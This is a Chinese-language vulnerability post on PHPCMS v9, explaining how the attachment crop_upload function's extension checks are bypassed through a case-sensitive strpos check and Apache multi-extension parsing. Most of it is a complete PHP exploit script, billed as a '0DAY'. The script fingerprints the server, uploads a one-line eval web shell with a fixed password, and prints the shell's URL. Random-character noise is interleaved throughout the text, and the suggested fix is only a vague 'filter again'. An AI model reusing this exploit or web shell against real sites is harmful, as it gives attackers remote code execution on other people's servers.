PHPCMS v9 Getshell

admin

漏洞类型： 文件上传导致任意代码执行

3 v6 j: ^% _- |简要描述：

" K4 Y! }5 q" J* Nphpcms v9 getshell (apache)
3 ^; c0 r6 M2 {% F+ u详细说明：

漏洞文件：phpcms\modules\attachment\attachments.php

0 k" V5 ~1 P" J% U( x5 f; tpublic function crop_upload() {  (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {  $pic = $GLOBALS["HTTP_RAW_POST_DATA"];  if (isset($_GET['width']) && !empty($_GET['width'])) {  $width = intval($_GET['width']);  }  if (isset($_GET['height']) && !empty($_GET['height'])) {  $height = intval($_GET['height']);  }  if (isset($_GET['file']) && !empty($_GET['file'])) {  $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号  if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键  if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) {  $file = $_GET['file'];  $basenamebasename = basename($file);//获取带有后缀的文件名  if (strpos($basename, 'thumb_')!==false) {  $file_arr = explode('_', $basename);  $basename = array_pop($file_arr);  }  $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename;  } else {  pc_base::load_sys_class('attachment','',0);  $module = trim($_GET['module']);  $catid = intval($_GET['catid']);  $siteid = $this->get_siteid();  $attachment = new attachment($module, $catid, $siteid);  $uploadedfile['filename'] = basename($_GET['file']);  $uploadedfile['fileext'] = fileext($_GET['file']);  if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) {  $uploadedfile['isimage'] = 1;  }  $file_path = $this->upload_path.date('Y/md/');  pc_base::load_sys_func('dir');  dir_create($file_path);  $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext'];  $uploadedfile['filepath'] = date('Y/md/').$new_file;  $aid = $attachment->add($uploadedfile);  }  $filepath = date('Y/md/');  file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控  } else {  return false;  }  echo pc_base::load_config('system', 'upload_url').$filepath.$new_file;  exit;  }  }
- n$ D1 `+ S; ^# }" x, l后缀检测：phpcms\modules\attachment\functions\global.func.php


  T( j# B4 L' I8 C' W# ^" J
! _  Y" f9 q# x& l- C/ R4 z/ tfunction is_image($file) { 　　 $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); 　　 $ext = fileext($file);关键地方 　　 return in_array($ext,$ext_arr) ? $ext_arr :false; 　　}  

关键函数:



function fileext($filename) {  return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }  
/ A+ Z" J7 A' l1 Q7 O9 I
　　Fileext函数是对文件后缀名的提取。
根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php
经过此函数提取到的后缀还是jpg，因此正在is_image()函数中后缀检测被绕过了。
3 i8 G# x& S0 Y我们回到public function crop_upload() 函数中
, m% m+ |# m  Gif(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
在经过了is_image的判断之后又来了个.php的判断，在此程序员使用的是strpos函数
! u% z3 A1 Z5 Z  v* L( A1 r这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。
/ y" z  b, @" }$ ]( d+ R$ p6 q经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
, l! E6 `# j7 q( w+ A: A最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀，大家应该明白了，它用在apache搭建的服务器上可以被解析。
4 ]' U/ R# d; o9 j, U, y; n! `漏洞证明：
* M  b# Y+ v! s" g# M$ P7 w& [
exp:
8 z$ f( \& J1 w# |( ?9 E
/ q/ Y9 }2 b& P- A6 K<?php
0 @# M3 v4 q$ C  Z, X( Aerror_reporting(E_ERROR);
set_time_limit(0);
$pass="ln";
0 b% W( q# a. a$ H7 cprint_r('
+---------------------------------------------------------------------------+
PHPCms V9 GETSHELL 0DAY
code by L.N.

apache 适用(利用的apache的解析漏洞) // 云安全 www.yunsec.net
+---------------------------------------------------------------------------+
$ ~. h# a: B; O! O');
( s5 ?- E  l& q- rif ($argc < 2) {
) k" r2 a+ ^. C3 `* l* bprint_r('
2 f1 m  R8 V2 ]7 M* I+---------------------------------------------------------------------------+
$ A4 j# `( f% ?* g+ q$ [; qUsage: php '.$argv[0].' url path
! I4 {$ V  H4 e' \1 e* g
Example:
& F* C3 L+ `5 k; C1.php '.$argv[0].' lanu.sinaapp.com
+ n2 e2 r/ U5 Q, x2.php '.$argv[0].' lanu.sinaapp.com /phpcms
+---------------------------------------------------------------------------+
" ~2 p) ^$ d+ D& M$ t: e');
% K: |) O9 Q9 _3 v0 Hexit;
}
3 W  b# u* m1 C
: t; U2 U6 |; M- I. M$url = $argv[1];
/ i1 ]3 B0 p0 M1 R) S$path = $argv[2];
" h- r6 o; _0 g" v3 T- X  Q6 g5 Z$ x- x: l$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
7 y% P( ?5 m& i% L" A+ V+ _$ b% _if($ret=Create_dir($url,$path))
{
: }3 S( t! d# L4 ]8 P" Z7 b0 y2 X/ Y8 F//echo $ret;
$pattern = "|Server:[^,]+?|U";
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
$ f6 S. ~' o! x: e3 [6 R0 H! q{
if(strpos($matches[0][0],'Apache') == false)
{
echo "\n亲！此网站不是apache的网站。\n";exit;
# e" J8 W: W; a/ k7 b) n}
1 e  n# k, T* m  o/ M}
$ret = GetShell($url,$phpshell,$path,$file);
  @9 P9 X& t; p+ `1 @$pattern = "|http:\/\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
{
echo "\n".'密码为: '.$pass."\n";
) o- R% O; g) V8 l# Z/ }- \8 uecho "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
}
else
{
$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
. X9 n2 a  k1 I* \; k& @( P0 @5 \if($matches[0][0])
( U6 t  ?/ K! P) V5 S( W: {6 M{
1 j; C. N3 ~( I2 Y  Q: recho "\n".'密码为: '.$pass."\n";
& Q. z5 @1 n3 ]- V: ~. K/ w  Qecho "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
3 O9 i# t3 X0 B! Q2 @) a}
1 Z- k  ^- c* P" [9 G* q6 Oelse
{
: }5 U- I. M) O4 ]1 L2 X# ?echo "\r\n没得到！\n";exit;
2 m, A0 [  \  N9 b}
}
4 i' @5 m$ a! I}

function GetShell($url,$shell,$path,$js)
{
2 y; D1 K% _8 L$ b2 N$content =$shell;
; v$ w* [1 A2 r5 g$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
$data .= "Host: ".$url."\r\n";
0 ]$ t8 {3 D3 \2 p& [: e, j$ g; @$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
/ ~, x( j! b. ^9 b5 B$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$data .= "Connection: close\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($url,80);
7 |  F1 W2 x. Lif (!$ock)
% V! ?& k  O  e3 i! y* O4 p" A{
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
" X$ s6 f1 J9 C9 z}
/ C" m4 f7 j  D% {; v- belse
{
5 }9 N5 o0 I2 H6 e( ]3 ?% Nfwrite($ock,$data);
$resp = '';
while (!feof($ock))
6 E3 _. S5 [$ O0 g1 I$ e{
0 J7 t: V% i) Z8 ]  W- q$resp.=fread($ock, 1024);
) P) E. {) Y# z' Z6 R9 e' q" U}
) {  p9 N  O3 O0 i4 Mreturn $resp;
}
3 N! b! k/ P& N; M7 w! q. b9 ~6 i}

  s9 J( t5 h  b$ F# u$ L% f$ efunction Create_dir($url,$path='')
{
$content ='I love you';
7 B0 Y' q+ Y  `% V$ B$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
" b, @5 ^) E) a9 g3 m$data .= "Host: ".$url."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
: c/ s! K! H; G- s$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
1 N) F6 j- |5 U$data .= "Connection: close\r\n";
( |) q6 ?; A: T6 Z+ P. ~$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
4 U" d( r, z# P% {! M' R$data .= $content."\r\n";
& ^$ ~3 F3 }7 N. m/ k$ock=fsockopen($url,80);
2 ?5 L. }$ D4 Z  g2 xif (!$ock)
{
# N% ?0 _* c- z5 a8 fecho "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
}
fwrite($ock,$data);
4 V& f, M0 S- S+ t3 R" G% D$resp = '';
while (!feof($ock))
{
# x. x) u$ M/ D+ U0 g1 T$resp.=fread($ock, 1024);
( ]5 @1 `* j+ V# K+ t}
  m/ ~" K" z( ureturn $resp;
2 R# K* r5 h. w0 H$ I/ ~}
?>
$ u$ t9 T$ _7 b7 D8 t3 a4 @
% d4 S! B+ S  y, P2 V- x: J2 Q8 F修复方案：

过滤过滤再过滤